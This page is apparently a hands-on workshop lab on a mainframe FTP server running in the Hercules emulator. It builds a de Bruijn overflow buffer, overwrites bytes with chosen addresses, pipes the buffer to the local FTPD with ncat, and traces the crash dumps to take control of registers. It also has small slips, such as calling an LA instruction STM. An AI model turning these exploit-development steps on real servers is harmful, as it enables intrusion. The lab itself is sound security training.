created: 20220801234259555
modified: 20220805170656775
tags: 
title: Lab 11 - 2 Crash 2 Furious
type: text/vnd.tiddlywiki


!! Creating the New buffer

# Run `printf 'user ' > pattern2; rexx ~/labs/DEBRUJIN.rexx 1500 >> pattern2`
# Edit pattern2 with your editor of choice: 
#* e.g. `okteta pattern2` on the workshop vm
# Search for (ctrl-f in okteta) our pattern: `Bh7B`
# Replace these four bytes with `80127B12`
# Save your changes

[img[Screenshot_2022-08-03_16-17-06.png]]

!! Restarting the FTPD server

# On the Command line in http://localhost:8888 (Username/password: `defcon`) type `/start ftpddc30,srvport=2122`
#* This starts the FTP server on port 2122, since it crashed using port 2121 that port is not longer available
# Submit your edited second buffer: `cat pattern2|ncat -v -w1 localhost 2122`
# Notice in the hercules console at http://localhost:8888/ the message `/ IEF450I FTPDDC30 FTPDDC30 - ABEND S0C4 U0000` means we've crashed FTPD
# Congrats you crashed it, again!

!! Tracing this second Dump (heh) or Second step same as the first

# Copy the dump to `~/dump.txt` again: `cp ~/dumps/prt00e.txt ~/dump.txt`
# Open the file in your editor of choice: `kate ~/dump.txt`
#* ⚠️ This file contains the previous dump as well as the current one. ⚠️ 
# Search for `PSW AT ENTRY TO ABEND  078D1000 00095CCC` and take note of the address `00095CCC`
#* we need this address but since the addresses start at 0 we'll search for `095CC0`
# Search for `0CD940`. This should give you a line similar to `095CC0   14414780 F0380640 4440F04C 41242001`
#  `C` bytes in is this instruction: `41242001`
# Use DECODEI to decode the instruction from machine code to readable in your linux terminal: `rexx ~/labs/DECODEI.rexx 41242001`
#* The output from decoding is: `LA R2,1(R4,R2)`
#* STM is store multiple: http://www.simotime.com/asmins01.htm#LA this means that the machine is going to load the address at  (R2 + R4) in to R2
# Search the file for `REGS AT TIME OF ERROR` and notice that R2 is set to `F3C287F4`. (` 3Bg4`)
#* ''Note'' there's now two dumps in the dump log
# As previously `F3C287F4` does not exist as a location in memory, we need another place we can jump to. 
# Open pattern2 with your hex editor: `okteta pattern2`
# replace the four bytes at 3Bg4 with: `80124142`
#* This will get converted from ascii to ebcdic to `2012C1C2`
# Save your changes as `pattern3`

!! Restarting the FTPD server

# On the Command line in http://localhost:8888 (Username/password: `defcon`) type `/start ftpddc30,srvport=2123`
# Submit your edited buffer: `cat pattern3|ncat -v -w1 localhost 2123`
# Notice in the hercules console at http://localhost:8888/ the message `/ IEF450I FTPDDC30 FTPDDC30 - ABEND S0C1 U0000` 
# Congrats you crashed it, again, uh, again!

